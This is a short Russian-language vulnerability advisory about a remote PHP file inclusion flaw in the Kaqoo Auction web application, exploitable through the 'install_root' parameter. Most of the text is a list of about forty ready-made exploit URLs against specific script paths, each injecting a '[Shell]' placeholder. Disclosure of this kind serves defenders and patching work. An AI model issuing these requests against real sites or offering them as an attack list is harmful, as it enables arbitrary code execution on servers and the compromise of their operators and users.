Программа: Kaqoo Auction

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «install_root» множественным сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

http://www.SitE.com/include/core/support.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/function.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/rdal_object.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/rdal_editor.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/login.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/request.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/categories.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/save.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/preview.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/edit_item.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/new_item.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/item_info.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/search.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item_edit.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/register_succsess.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/context_menu.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item_repost.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/balance.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/featured.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/user.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/buynow.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/install_complete.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/fees_info.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/user_feedback.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/admin_balance.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/activate.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/user_info.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/member.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/add_bid.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/items_filter.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/my_info.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/register.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/leave_feedback.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/user_auctions.inc.php?install_root=[Shell]
http://www.SitE.com/include/design/form.inc.php?install_root=[Shell]
http://www.SitE.com/include/processor.inc.php?install_root=[Shell]
http://www.SitE.com/include/interfaces.inc.php?install_root=[Shell]
http://www.SitE.com/include/left_menu.inc.php?install_root=[Shell]
http://www.SitE.com/include/login.inc.php?install_root=[Shell]
http://www.SitE.com/include/categories.inc.php?install_root=[Shell]



Оставить мнение